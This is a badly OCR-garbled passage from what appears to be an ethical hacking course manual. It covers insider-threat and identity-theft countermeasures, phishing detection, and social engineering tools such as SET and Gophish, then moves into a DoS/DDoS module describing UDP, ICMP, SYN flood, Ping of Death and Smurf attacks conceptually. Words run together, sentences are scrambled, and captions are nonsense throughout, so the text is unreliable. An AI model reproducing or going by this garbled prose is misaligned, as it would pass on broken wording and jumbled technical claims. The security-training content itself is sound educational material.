themethodsto detectinsiderthreatsare givenbelow:
InsiderRiskControls
Insiderdata risk presentsanother layer of complexityfor securityprofessionals.
It
requiresdesigning infrastructurein sucha way that user permissions,
security access
anduser actionsare monitoredefficiently.
controls,
DeterrenceControls
Theorganization's securityframeworkmust contain safeguards,
followrecommended
actions of the employee andIT professionals,
provide of duties,
a separation andassign
privileges. Thesesecuritycontrolseliminate or minimize the securityrisks to the
organization's criticalassets.
professionals
Thedeterrencecontrolsthat the security must have i n place
to deter
insider threats are DLP (DataLoss Prevention)
tools, and Identityand Access
Management
(IAM)
tools.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of thedeterrencecontrolsare:
‘Some
DLP
*
Tools:
DataLossPrevention(https://www.symantec.com)
Symantec
© DataLossPrevention(https://securetrust.com)
SecureTrust
* PointDataLossPrevention(https://www.checkpoint.com)
Check
©. IAM
Tools:(hetps://www.sailpoint.com)
#

IdentitylQ
SailPoint
*

*
Suite
(https://www.rsa.com)
RSASecurlD

Core
Access
Assurance
Suite
(https://www.coresecurity.com)
DetectionControls
Security
professionals controlsandtools to analyze
must use a varietyof security and
detect
insider
threats organizations.
in

professionals
The detectioncontrolsthat the security must have in place
to detect
insider threats are IDS/IPS detection and preventionsystems),
(Intrusion log
management andSecurity
systems, InformationandEventManagement (SIEM)
tools,

Some controls
are:
of the detection

Tools
IDS/IPS
©.

*
(https://www.checkpoint.com)
Check PointIPSSoftwareBlade
* IBM Security (https://www.ibm.com)
NetworkIntrusionPreventionSystem
+ AlienVaultUnifiedSecurity
Management (https://www.
alienvault.com)
Tools
LogManagement
* SolarWinds
Security (https://www.solarwinds.com)
Event Manager
+
(https://www.splunk.com)
Splunk
*
(https://www.loggly.com)
Logely
SIEM
Tools
ArcSight ESM(hetps://www.microfocus.com)
*
LogRhythm (https://logrhythm.com)
NextGenSIEMPlatform
# SolarWinds
Log& Event Manager(https://www.solarwinds.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 InsiderThreatsCountermeasures

BDeos pritenes
Controleaccess
Upton
ting
{Employee
en
eter
secaity
background
veifeation

andsing
Uogsng Pero onament

Employee
monitoring Privileged
users monitoring

Legal
polices Credentials
deactivation
credential
fr terminated

Insider ThreatsCountermeasures
Thereare safety
measures that help
an organization
to prevent
or minimize insiderthreats:
+
Separation androtationof duties:Divideresponsibilities
amongmultiple employeesto
restrict the amount of poweror influenceheldbyany individual.Thishelps
to avoid
fraud,abuse,
and conflictof interest and facilitatesthe detectionof controlfailures
{including
bypassing theft).
securitycontrolsand information Rotationof duties at
randomintervalshelps to deterfraudor the abuseof privileges.
an organization

Leastprivileges:
Provideusers with onlyenough access privilege
to allow them to
performtheir assigned
tasks.Thishelpsmaintain informationsecurity.
Controlled access: Accesscontrols i n various parts of an organizationrestrict
unauthorizedusersfromgainingaccessto criticalassetsandresources.
Loggingand auditing:Performlogging andauditing periodically
to check
formisuseof
company resources.
Employee monitoring:Use employee softwarethat recordsall user
monitoring sessions,
professionals.
andthat can bereviewedbysecurity
Legalpolicies:
Enforce legalpolicies
to preventemployees
from misusing the
organizations resourcesandsensitive datatheft.
Archivecriticaldata:Maintaina recordofthe organization’
criticaldatai n the formof
archivesto beusedas backup resources,if needed,
Employee trainingon cybersecurity: o n how to protecttheir
Train employees
credentialsand the company’s
confidentialdata from attack.Theywill be able to
identify
socialengineeringattemptsandtakepropermitigationsandreportingsteps.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Employeebackground verification:Ensure thorough backgroundchecksof all
before hiring
‘employees them byusing Google searchandsocialnetworking
sites and
consulting
previous
employers.
Periodicrisk assessment: Performa periodic
risk assessmenton critical assets to
identify
vulnerabilitiesand implement againstboth insiderand
protectionstrategies
outsiderthreats.
Privilegedusers monitoring: Implement additionalmonitoringmechanisms for system
administratorsand privileged users as theseaccountscan be used to can deploy

malicious
bomb
codeor logic on the systemor network,
Credentialsdeactivationfor terminatedemployees: Disableall the employee's
access
profiles locations,
to the physical networks,systems,applications,anddataimmediately
after termination.
Periodicrisk assessments:Performperiodic risk assessmentson all the organization's
criticalassetsthen develop
and maintain a risk management strategyto secure those
assetsfrombothinsidersandoutsiders.

Layered Implement
defense: multiple
layers
of defenseto preventand protectcritical
assetsfromremote attacksoriginated
frominsiders.Develop
appropriate
remote access
policiesandproceduresto thwartsuchattacks.
Physical Builda professional
security: team that monitors the physical
security security
ofthe organization.
Surveillance:Install video cameras to monitor all critical assets. Install and enable
screen-capturingsoftware o n allcriticalservers,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TheftCountermeasures
Identity

your
Ensure
wilt
name snot i n marketers
present Protec
publeed your
personalinformation
fombeing

fevew
store
your ert cardstatement
secure, outofreachofothers
regularyand Donot
rumbers or
Spay
unless
shareanyaccoue/contact
mandatary

wear Montor
enline
banking cts regularly

seepyourmatstaeyenpvngtemaitox
BY Newer Itanypavo eter on ce

Theft Countermeasures
Identity
Identity
theft occurs whensomeone usespersonal information(suchas a name, socialsecurity
number, dateofbirth,
mother’s
maiden way, name, or address)
without the person's
card or loan services, or even rentalsand mortgages,
permission.
i n 2 malicious such
knowledgeor
asforcredit

Listedbeloware countermeasuresthat,on implementation,will reducethechances

of identity
theft:
+
Secureor shredall documents privateinformation
containing
+
Ensure on the marketers’
your name is not present it lists
+
Reviewcreditcardreports regularly
Nevergive anypersonal
informationover the phone
To keep
mailsecure,emptythe mailboxquickly
Suspect andverifyall requests for personal
data
Protectpersonalinformation frombeing publicized
Do
not
display
account
Monitoronlinebanking
or contact numbers unlessmandatory
activities regularly
Never listanypersonal identifierson socialmediawebsitessuchas your father’s
name,
pet's or cityofbirth,
name, address,
Enabletwo-factorauthenticationon all onlineaccounts
Neveruse public
Wi-Fifor sharing
or accessingsensitive information

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ‘=
toolssuchas a firewallandanti-virus on yourpersonal
Installhostsecurity computer
Someadditionalcountermeasures against theft are as follows:
identity
=
Tokeep
mail
secure,
asking
requests mailbox
emptyyour
forpersonal
quickly
information
anddo not reply
to unsolicited
email

Shredcreditcardoffersand“convenience
checks―
that are not useful
Donot store any financialinformationon the system anduse strongpasswords
for all
financial
accounts,
Checktelephone andcellphone billsforcallsyou didnot make,
KeepyourSocialSecurity card,passport, license,andothervaluablepersonal
informationhiddenandsecured.
Readwebsiteprivacypolicies.
Becautious beforeclicking
on a link provided
in an emailor instant message.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to DetectPhishing
Emails?

BB) to peso
reas
yourbook
berm ited emai abe

BB)or
ors ofrzeney vaste

mates
My contneranmatalpeng

How to DetectPhishing
Emails?
Todetectphishing emails,
first,hoveryour mouse pointerover the name i n the “From―
column
Doing
then it couldbe a phishing
displayit’s
the
so will showwhether original domainname is linkedto the sender's
email.For example,
domainas “gmail.com.―
“From―
name; ifitis not,
an emailfrom Gmail.comshouldprobably

Check to see if the emailprovides a URLandprompts the user to clickon it. If so, ensure that
the link is legitimate byhovering the mouse pointerover it (todisplay the link’s URL) and
ensure it usesencryption (https://).
To beon thesafeside,always opena new windowandvisit
the
site
Do not
bytypingit i n directly
provide
insteadof clicking
on
the
link provided
website,
any informationto the suspicious
i n theemail

as it will ikely
link directly
to the
attacker.
fewotherindicatorsof phishing
‘A emails:
=
Itseems to befroma bank,company,or socialnetworking
site andhasa generic
greeting
It seemsto be froma personlistedi n youremailaddressbook
Ithas a n urgenttone or makesa velledthreat
tt may contain grammaticalor spellingmistakes
It includes
linksto spoofed
websites
It maycontain offersthatseemto betoo good
to be true
It includesofficial-looking
logosandotherinformationtakenfromlegitimate
websites
it may contain @malicious
attachment

ical andCountermensores
Mackin ©by E-Comel
Copyright
 915: an
Figure
Email
withof
Screens
ot Showing IndicationsPhishing

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Toolbar
Anti-Phishing

sean
|S
ging
ena met 8

Page
Malicious
‘Suspected

Toolbar
Anti-Phishing
+
Netcraft
Source:https://toolbar.netcraft:com
The Netcraftanti-phishing community is a giant neighborhood
watch scheme,
the most alert and most expertmembersto defendeveryonewithin the
‘empowering
community
againstphishing attacks.TheNetcraftToolbarprovides
updatedinformation
about sites that users visit regularly
andblocksdangerous sites.Thetoolbarprovides
a
wealthof informationabout popular websites.Thisinformationwill helpto makean
informedchoiceaboutthe integrity of thosesites.
shown in the screenshot,
‘As Netcraft protectsindividualsand organizations
from
phishing
attacksandfraudsters.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Malicious
Suspected Page
This pagehasbeen blocked
by the Netcraft

Figure9.16:
Screenshot
ofNetraft

Modul
9 127
Page tical andCountermensores
Making by Comet
Copyright©
PhishTank
Source:https://phishtank.com
PhishTank clearinghouse
is a collaborative for dataand informationabout phishing
on
the Internet.It provides
an open API fordevelopers
andresearchers
to integrate
anti:

data
phishing
into their applications.
showni n the screenshot,
‘As securityprofessionals
can use PhishTank
to checkwhether
maliciousURLis a phishing
‘a
not.
site or

PayPal»

Redesigned
withyou in mind.

Figure9.17:
Screenshot
ofPhishTank

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CommonSocialEngineering and DefenseStrategies
Targets

CommonSocialEngineering andDefenseStrategies
Targets
Attackersimplement
various socialengineering techniques
to trick people
into providing
sensitive information thushelping
abouttheirorganizations, attackers
to launchmalicious
activities. Thesetechniques
are usedon privileged
individualsor thosewhodealwith important
information.
Belowtableshowscommon socialengineeringtargets,various socialengineeringtechniques
thatattackersuse, andthe defensestrategies
to counter theseattacks.

Engineering AttackTechniques
Social Defense
Strategies
Targets

Front
office | and
help
desk
staff
Eavesdropping,
Train employees
surfing,never to revealpasswords
shoulder or other

desk
and
|policies
help intimidation persuasion,and_ information
impersonation,
for office
over thephone.
the front
personnel
Enforce
andhelp desk

|
Technicalsupport Impersonation, persuasion,
Traintechnical

phone system
support
administrators
never
executivesand
to reveal

administrators or
and system intimidation,fakeSMS,
calls,
andemails passwords otherinformation over the
phoneor email

| | Impersonation,reverse social Implement

Perimetersecurity engineering,pigeybacking, biometric
token,
strictbadge,
authentication,
or
employee
security
tailgating,
etc training,and guards

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Shouldersurfing, Implement
employee
training,best
office andchecklists
practices, for using

Vendors of the
‘eavesdropping,
and ingratiation
all
passwords.
persuasion,and Educatevendors
Impersonation,
Escort guests
aboutsocial
targetorganization intimidation engineering.

Mall room
mails
or forging
Theft,damage, of
Lockthe andmonitor
employees
mailroom,train

Machineroom and remove to

‘Attempting
gain access,
or attacha
equipment,
closets,
keepphone server rooms,and
Phone
closet protocol
analyzer
to extract
confidentialdata
an updated
at alltimesandkeep
other spaceslocked
inventoryof equipment

Company's
FakeSMS, phone calls,and Train executivesnever to reveal identity,
emailsdesigned to grab passwords, or other confidential
Executives
confidentialdata informationover the phone or email

Keep monitored
alltrashi n secured,
Dumpsters diving
Dumpster areas;shredimportant
data;and erase
media
magnetic
Table 93:
Common engineering
social a nddefense
targets strategies

ical andCountermensores
Mackin ©by E-Comel
Copyright
 J
SocialEngineering
Tools:SocialEngineering
Toolkit (SET) CEH
1GT heSociaLEngineer
Took(ST) an opensourcePython-diven
tool
testingaround
aimedat penetration
engineering
social a Seep
romewertisen
ephin

SocialEngineering
Tools
+
SocialEngineering
Toolkit(SET)
Source:https://www.trustedsec.com
The Social-Engineer
Toolkit (SET) is an open-sourcePython-driven tool aimed at
testingvia socialengineering.It is a genericexploitdesigned
penetration to perform
advancedattacksagainst humanelementsto compromise andmake themoffer
a target
sensitive information.SETcategorizes attackssuchas email,web,and USBattacks
according to the attack vector used to trick humans.The toolkit attackshuman
weakness, exploiting fearful,
the trusting, greedy, andthe helpful
nature of humans.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Somesocial
of
SET
showing
Screenshot
Figure 9.16:
menu
and
engineeringtoolsare listedbelow
attack
options
+
SpeedPhish (SPF)
Framework (https://aithub.com)
+
(hetps://getgophish.com)
Gophish
+
Phisher(hetps://github.com)
King
LUCY(https://Avww.lucysecurity.com)
MSISimple (https://microsolved.com)
Phish

Modul
09 1276
Page tical MakingandCountermensores
by Comet
Copyright©
 Audit Organization's for Phishing
Security Attacks using
OhPhish
(©
onphi is
a
web-base
poralt otest employees!
roel
‘uscepibityto
attacks
‘engineering

simulation tool that

theorganization
Brovides

phishing
simulation
GHIPHISH

Audit Organization's Security for PhishingAttacks using OhPhish

The primary objective of launching phishingimpaigns againstemployees
cai of the client
organizationis to assessthe employees’
susceptibility
to phishing attacksand helpthe
reducerisksthat arise whenthe employees
organization fall prey to phishing
attackssent by
cyber-threat
actors.
‘ObPhish
Source:https://ohphish.eccouncil.org
OhPhish is a web-based portalfor testingemployees’
susceptibility
to socialengineering
attacks.It is a phishingsimulationtoolthat providestheorganizationwith a platformto
launchphishing simulationcampaigns on its employees. The platform captures the
responses andprovides MIS reportsandtrends(ona real-timebasis) that can be
trackedaccording to the user,department, or designation.
OhPhishcan be used to audit an organization's securityfor phishingattacksusing
various phishing methodssuchas Entice to Click,CredentialHarvesting, Send
Attachment, Training,Vishing,andSmishing,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure9.9:Screenshot
ofOhPhish
 Module Summary

inthis
>
mole,
have
Seca the we

engineering
discussed following:
along wih various kinds
concepts ofsocial attacks
enineering

Insider
socal
engineering
technique
Human,computer,

threats
b ased
andmobile

a n thevarious forms
theyan take
on socal
Impersonation networking
ses

inthe
Detalls
of
variousdefend
countermessures

nextmal, we wlee
tht can

ow attackers
as walas
an organization

ethical
agains
soc

hackersnd penetration
testers,perform
DoS/0005 attacks

Module Summary
This modulediscussed socialengineeringconceptsalongwith various phases of social
engineering
attack. It alsodiscussed
socialengineeringtechniques.
various human-based,
Themodulediscussed
of insiderthreats.It gave an overview of impersonation
computer-based, andmobile-based
threats,including
insider thevarious types
on socialnetworking sites. It also
discussed identity theft and the typesof identitytheft.The moduleendedwith a detailed
discussion of various signs to watchfor and countermeasures to employi n order to defend
againstsocialengineeringattacks, insider
Thenext modulewill showhowattackers,
threats,
andidentitytheft.
hackersandpen testers,perform
as well as ethical
D0S/DD0Sattacks,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
Certified Ethical Hacker

Module10:
Denial-of-Service
 Module Objectives
ofDenisaSarce
‘overview (008)a ndOstrlbuted
Deniaof Service(DDaS)Atacks

oierentDoS/0D0S
Understanding Atak Techniques

Understanding
Various09Sand0005AttackTools

Oitferent
Understanding to DetectDoS
Techniques a ndDDoS
tacks

Understanding
oitferent
DaS/0D0S
Countermessues

Module Objectives
(005)andDistributedDenial-of-Service
Denial-of-Service (DDoS)
attacksare a majorthreat to
networks.Theseattacksattemptto makea machineor networkresource unavailable
computer
Usually,
to its authorizedusers. DoS/DD0S attacksexploitvulnerabilitiesi n the implementation
ControlProtocol(TCP)/Internet
of the Transmission Protocol(IP)modelor bugs i n a specific
operatingsystem(0S).
Thismodulestarts with an overview of DoSandDDoSattacksand thenprovides insightinto
differentDoS/DDeSattacktechniques. Later, the botnet network,
it discusses DoS/DDoS attack
tools,
to
techniques detectDoS/DDoS attacks,
andDoS/DDOS countermeasures.

of module,
At theend this
will do the
following:
you beableto
=

=
Describe
DoS/DD0S
concepts
Understand
attack
DoS/DDeStechniques
various
Describe
botnets
IllustrateDoS/DDoS
casestudies

Explaindifferent
DoS/DDoS attacktools
Apply bestpractices
to mitigateDoS/DDoSattacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

DoS/DDoSConcepts
Fora good of DoS/DDoS
understanding one must be familiar
attacks, with relatedconcepts
in

section
advance.This
defines
attacks
discusses
DDoS
attacks
DoSandDDoS and how work.

ical
Mackin
and ©by
CountermensoresCopyright
E-Comel
 What is a DoSAttack?

is
{©Denia.fService(00S) an attack computer
ona or
network
hat reduces,
restrits orprevents

| 00SIn stack,attackerslod theviet system

or
th nonegtimatserves requets trai to

Whatis a DoSAttack?
A.DOS attackis an attackon a computer or networkthat reduces, restricts,
or prevents a ccess
to system resources for legitimate users. in a DoSattack, attackersflood a victim'ssystemwith
nonlegitimate service requestsor trafficto overloadits resources and bring downthe system,
leading
system of goal
to the unavailability

performance,
or network
a is
the victim’s
The
websiteor at leastsignificantly
of DoSattack to keep
reducing
legitimate
thevictim’s
usersfrom using

The
rather
the system, than to gainunauthorized
following examples
are fortypes
access to a system

of Dosattacks:
or to corrupt data.

‘=
the victim'ssystem
Flooding with more trafficthan it can handle
=

=
Flooding (e.g,, Chat
a service

Crashing
a TCP/IP
(IRC])
events
handle
InternetRelay
stackbysending corruptpackets
with more thanit can

Crashing
a service by interactingwith it i n an unexpectedmanner

Hanging
a system bycausingit to go into an infiniteloop

ical andCountermensores
Mackin ©by E-Comel
Copyright
 &.
4
A
agar Htc

10:1:Schematic
Figure ata DoS
attack
DoSattackshave variousformsand targetvariousservices.The attacks may cause the
following
of
Consumption resources
=

=
Consumption
ofbandwidth,
Actualphysical
data diskspace,CPUtime,or structures
destructionor alterationof networkcomponents
Destruction of programming
andfilesi n a computer
system
In general,DoSattackstarget networkbandwidthor connectivity. Bandwidthattacksoverflow
the networkwith a highvolumeof traffic by using existingnetwork resources, thereby
deprivinglegitimateusers of these resources, attacksoverflowa system
Connectivity with a
largenumberof connection requests, consumingall availableOSresources to preventthe
systemfrom processing legitimateuser requests.

Consider a foodcatering companythatconducts muchof its businessover the phone.if an

attackerwants to disruptthis business,theyneedto find a wayto blockthe company’s
phone
whichwould makeit impossible
lines, for the companyto do business.A DoS attackworks
alongthe same lines—the attackeruses up all the waysto connect to the victim'ssystem,
‘making
legitimatebusinessimpossible.
Dos attacksare a kindof security breachthat doesnot generally resulti n the theft of
information.However, theseattackscan harmthe targeti n terms of time and resources.
Furthermore,
scenario,
of people
security
aDoS
can
attack
failuremight
cause the accidental
whowere connected to thevictim'ssystem
of
cause theloss a service such as email.In the worst-case

at the time of the attack. of

destructionof the filesandprogramsmillions

ical andCountermensores
Mackin ©by E-Comel
Copyright
 What is a DDoSAttack?

(©.
Cistituted denis-of-srvice
(Gotnet)attacking
single denying
thereby
target, of
(0005)a coordinatedatack thatinvolves&multitude compromised
service to users ofthe targeted sytem
systems

ImpactofDDos
|| do
de
How
Hew
DDoS
DDoS,

Whatis a DDoSAttack?
Source:http://searchsecurity.techtarget.com
A DDoSattackis a large-scale,
coordinatedattackon the availability
of services on a victim's
systemor networkresources, and it is launched through
indirectly many compromised
computers(botnets)
on the Internet.

definedbytheWorldWideWebSecurity
‘As FAQ,“A (DDoS)
distributeddenial-of-service attack
Usesmanycomputers to launcha coordinatedDoSattackagainst Using
one or more targets.

client/server
technology,
servicesignificantly
which serve
byharnessing
is ableto multiply
the perpetrator the effectiveness
the resources of multiple
as attack platforms.―
of the denialof
unwittingaccomplice
The flood of incomingmessages
computers,
to the targetsystem

essentially
forces
down,service
it to shut
The services underattackbelong
thereby denying to legitimate
to the “primary
victim,―
whereas
users
the compromised systems
used to launchthe attackare called “secondary The use of secondary
victims.― victims i n
performing a DDoS attackenablesthe attackerto mount a large and disruptiveattackwhile
‘making
it difficultto trackdownthe original
attacker.
Theprimaryobjective
of a DDoSattackis to firstgainadministrativea ccesson as manysystems
as possible.
In general, attackersuse a customizedattack scriptto identifypotentially
vulnerable
systems.After gainingaccessto the targetsystems, the attacker uploadsandruns
DDoSsoftwareon thesesystems at the time chosento launchtheattack,
DDoSattackshavebecomepopular becauseof the easy accessibility
of exploit
plans
andthe
negligible
amount ofbrainworkrequiredto execute them.Theseattackscan beverydangerous
becausetheycan quickly
consume the largest rendering
hostson the Internet, themuseless.

ical andCountermensores
Mackin ©by E-Comel
Copyright
The impactsof DDOS includethe lossof goodwill,
disablednetworks,
financiallosses,
and
disabledorganizations.
How doDDoSAttacksWork?
In a DDoSattack,
many applications
barrage a targetbrowseror networkwith fake exterior
requeststhat makethe system,network, browser, and disabled
or site slow,useless, or
unavailable.
Theattackerinitiates the DDoSattack bysending a command to zombieagents, whichare
Internet-connected computers compromised by an attackerthrough malwareprogramsto
performvarious maliciousactivities through a commandand control (C&C) server. These
zombieagentssenda connection requestto a largenumberof reflectorsystems with the
spoofedIP addressof the victim,whichcauses the reflectorsystems to presumethat these
requests
originate fromthevictim'smachine insteadof the zombie agents. Hence,the reflector
systemssendthe requested information(response to the connection request) to the victim
Consequently,the victim’s
machineis floodedwith unsolicitedresponses fromseveralreflector
computers simultaneously, which mayeither reducethe performance or cause the victim's

to
machine shutdowncompletely.

taht
8 2) Insaco te

Compromised
PCs(Zombies)

Compromived
PCs(Zombies)

a
gute10.2:SehematicafDes attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

DoS/DDoSAttack Techniques
implement
Attackers various techniques
to launchDoS/DDoS
attackso n targetcomputers or
networks.Thissection discusses of DoS/DDoS
the basiccategories attackvectors and various
attack
techniques.

Module1 0Page
1287 tical MakingandCountermensores
by
Copyright©
Comet
 BasicCategories
of DoS/DDoSAttackVectors
‘Volumetric
Attacks ProtocolAttacks Application
LayerAttacks
bani

ofattack
T h emagnitude
ofa
other
types or
target (@consume
Ikeconnection
o f resources
stat tables
present
(@consumetheresources
servicesofanappliation,
thereby
making theap
resturedi n bit-pe-second
(bps)
of bandwidth
Types
(©ood stacks
depletion
magnitude
packets
(©The
measured
(00s)
andapplication
firewalls

in
oftacks
servers

per-second
Themagntude
of attack's
second(os)
(©Amplifeatonstacks

tack Teehniaues tack Techniques ack Techniqves

cer/post
stack 9 TT

Png
fDeath
atack
Spoeedeson
ood
andmur
ayer
ood stack | UoPppleation

BasicCategories
of DoS/DDoS
Attack Vectors
DDoSattacks mainlyaim to diminish the network bandwidth by exhausting network,
application,
or service resources,thereby legitimate
restricting users from accessing
system
or
DoS/DDoS
networkresources. In general, attackvectors are categorizedas follows
Volumetric Attacks
Theseattacksexhaustthe bandwidtheither within the targetnetwork/service or
betweenthe targetnetwork/service and the rest of the Internet to cause traffic
blockage, access to legitimate
preventing users. Theattackmagnitude is measured
in
bitspersecond(bps)
VolumetricDDoSattacksgenerally targetprotocols suchas the NetworkTimeProtocol
(NTP), Domain Name System (ONS), andSimple Service DiscoveryProtocol(SSDP), which
are statelessanddo not havebuilt-incongestion avoidancefeatures.Thegeneration of
a large numberof packets can cause the consumption of the entire bandwidthon the
network.A single machinecannot make enough requeststo overwhelmnetwork
equipment. Hence,i n DDoS attacks, the attackeruses severalcomputers to flood a
Victim.In thiscase,the attackercan controlallthemachines and instruct themto direct
traffic to the targetsystem. DDoSattacksflood a network, causing a significant
statisticalchange
i n networktrafficthat overwhelms
networkequipmentsuchas
switchesand routers. Attackers use the processing power of a largenumberof
geographically
distributedmachines hugetrafficdirectedat the victim,
to generate
whichis why
suchan attackis
called
DDOS
attack
a

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thereare two typesofbandwidth depletion
attacks:
In floodattack,
a zombiessendlarge volumesof traffic to the victim’s
systems
to
the bandwidthof thesesystems.
‘exhaust
© Inan amplification
attack, theattacker
or zombiestransfer messages to a broadcast
IPaddress.Thismethodamplifies
malicioustrafficthat consumes the bandwidthof

systems.
the victim's
Attackersuse botnetsandperform DDoSattacksbyflooding the network.The entire
bandwidthis usedup byattackers,and no bandwidthremains for legitimate
use. The

©.
are volumetric
following
attack
techniques:
for
examples
(UDP)
UserDatagram
Protocol floodattack
InternetControlMessage
Protocol(ICMP)
floodattack
of Death(PoD)
Ping attack

Smurf
attack
Pulsewave attack
Zero-day
attack
© MalformedIPpacket
floodattack
© Spoofed
IP packet
floodattack
Protocol
Attacks
Attackerscan also preventa ccessto a targetbyconsuming typesof resources other
than bandwidth, such as connection state tables. ProtocolDDoS attacksexhaust
o n the targetor on a specific
resources available devicebetweenthe targetand the
Internet. Theseattacks consume the connection state tables presenti n network
infrastructuredevicessuch as load balancers, firewalls,and applicationservers.
Consequently,no new connections will be allowed, becausethe devicewill be waiting
for existingconnections to closeor expire. In this case, the attack magnitude is
measuredin packets per second(pps) or connections per second(cps).Theseattacks
can even take over the state of millionsof connections maintainedbyhigh-capacity
devices.
Thefollowing
are examples
for protocol
attacktechniques:
Synchronize
(SYN)
floodattack © ACKandPUSHACKfloodattack
attack
Fragmentation © TCPconnection floodattack
‘Spoofed
sessionfloodattack © TCPstate exhaustionattack
‘Acknowledgement
(ACK)flood RST
attack
attack
floodattack
SYN-ACK

ical andCountermensores
Mackin ©by E-Comel
Copyright
Application Attacks
Layer
In theseattacks,the attackerattempts to exploit
vulnerabilitiesi n the application
layer
protocolor in the application itselfto preventlegitimate users fromaccessing the
application,Attacks on unpatched, vulnerable systemsdo not require as much
bandwidth or volumetric
a s protocol DDoSattacksforsucceeding.In application
DDoS
attacks,
the application layeror application
resources are consumedby opening
connections andleaving
themopen until no new connections can be made.These
attacksdestroy a specific aspectof an application
or service and can be effectivewith
one or a few attacking machines that producea lowtrafficrate. Furthermore, these
Themagnitude
attacksare very difficult to detectandmitigate. of attackis measured in
requestspersecond(rps).
Application-level
floodattacksresulti n the lossof services of a particular
network, such
as emailsandnetworkresources, or the temporary shutdownof applications and
this attack,
services. Through attackersexploit weaknesses in programmings ource code
to preventthe application legitimate
fromprocessing requests,
Severalkindsof DoSattacksrelyon software-relatedexploits
suchas bufferoverflows.A
bufferoverflowattacksendsexcessive datato a n application
that eithershutsdownthe
application
or forcesthe data sent to the application
to run on the host system. The
attack crashesa vulnerablesystem remotely bysending excessive traffic to an
application,
Occasionally,
attackerscan also execute arbitrary
code on the remote system via a
bufferoverflow.Sending too muchdata to an applicationoverwrites the data that
controlsthe program,enabling
the hackerto run theircodeinstead.

Using
© Floodweb
flood
attacks,
application-level
attackers
user
applicationslegitimate
with
do
the
following: attemptto
traffic
© Disrupt
service to a specific
systemor personby,for example,
blocking
@user's
access through invalidlogin
repeated attempts.
© Jamthe application
databaseconnection bycrafting
maliciousStructuredQuery
Language(SQL)queries
Application-level
flood attackscan resultin a substantiallossof money,service,and
reputationfor organizations.
Theseattacks occur after the establishmentof a
connection. Becausea connection is establishedand the trafficenteringthe target
appearsto be legitimate,
it is difficult to detecttheseattacks.However, if the user
the attack,they
identifies can stopit and trace it backto its source more easily than
othertypesof DDOS
attacks.
Thefollowing
are examples layer
forapplication attacktechniques:
TransferProtocol( HTT)
© Hypertext floodattack
Slowlorisattack
© layer
UDPapplication floodattack

ical andCountermensores
Mackin ©by E-Comel
Copyright
DoS/DDoSAttack Techniques
Next, the following
DoS/0DoS
attacktechniques
will bediscussed:
UDP

ICMP
attack
flood

flood
attack session
flood
spoofed
HTTPS attack
GET/POST
attack
=

Popattack

Smurf Slowloris
attack
attack
Pulsewave attack
UDPlayer
application floodattack
Multi-vectorattack
attack
Zero-day
SYNfloodattack
Peer-to-peer
(PDoS)
Permanent
DoS
attack
attack
Fragmentation
attack DistributedreflectionDoS(DRD0S)
ACKfloodattack attack
TCPstate exhaustionattack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 UDPFloodAttack

(©Anattacker
sendsspootedUDPpackets

® igh
at very
ratetoa remotehoston random
packet partsof

‘The
ofpackets
sever
Nooing UOP
3
repeatedly
causes
deckfornonexistent
the to
applatons
the
—

nacessible bythesystem

anreply
with
Leglimate
applications
are
andgiv error an ICMP"Destination

thisattack
consumes network
resources and walle ot
oS
bandwith,exhaustingthenetwork unt goesone

UDPFloodAttack
In a UDPflood attack,
an attackersendsspoofed UDPpackets at a very high
packet rate to a

UDPpackets
Consequently, legitimate
applications
a
remote hosto n randomportsof targetserver byusinga large
causesthe server to checkrepeatedly
becomeinaccessible
source IP range.Theflooding
for nonexistent applications
bythe system,
of
at the ports.
and any attemptsto
accessthemreturn an error replywith an ICMP“Destination
Unreachable―packet.Thisattack
consumes network resources and availablebandwidth,exhausting the networkuntil it goes
offline,

4
3:
UDP
loadstack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ICMPFloodAttack

sequent sop responding

ICMPFloodAttack
Networkadministratorsuse ICMP primarily for IP operations, troubleshooting,and error
messagingfor undeliverablepackets.In this attack,attackerssendlarge volumesof ICMP echo
requestpackets to a victim'ssystem directly or through reflectionnetworks.Thesepackets
signal
the victim'ssystem to reply,
andthe large traffic saturates the bandwidthof the victim's
network connection,causingit to be overwhelmedand subsequently stop responding to
legitimate
TCP/IP
requests.
To protect ICMP floodattacks,
against it is necessaryto set a threshold thatinvokesthe ICMP
flood attack protectionfeaturewhenexceeded.Whenthe ICMPthresholdis exceeded(by
default,the thresholdvalueis 1000 packets/s),
the router rejects further ICMP echorequests

the
next security of
fromall addresses
second. the
in the same zone for the remainder current secondas well as

ical andCountermensores
Mackin ©by E-Comel
Copyright
 with ECHO
attacker ‘The
attackersends ICMP

tequests spooted source addresses

Target
Server

ECHO
Request
ECHO
Request

i |
Legitimate
a ICMP
request
ECHO rom
adressin thesame securityzone

Figure
20.4[CMPloadstack

Module0 1294
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
 Pingof DeathandSmurfAttacks
Pingof DeathAttack
© InaPngotDen (Po) tack an atc es tea na Surf
Smurf
Attack.
tack,
the the
source
adress
tac sooo

porte
wate
the
vic
ent ache, nately

PingofDeathAttack
In a Pingof Death(PoD) attack,
an attackerattempts destabilize,
to crash, or freezethe target
system or service bysending malformedor oversizedpackets usinga simple ping command
Suppose an attackersendsa packet with a size of 65,538bytesto the targetweb server. This
size exceeds the size limit prescribed
byRFC791 IP,whichis 65,535bytes.The reassembly
processperformed bythe receivingsystemmightcause the systemto crash.In suchattacks,
the attacker'sidentity c an be easilyspoofed, and the attacker might not need detailed
knowledge ofthetargetmachine, exceptits IPaddress.
20Bvtes_saytes
ea
HEADERHEADER

Attacker 105: Ping-of

Figure deathattack
Target
Server

Smurf
In a
Attack
Smurfattack,
the attackerspoofs
the source IP addresswith the victim'sIP addressand
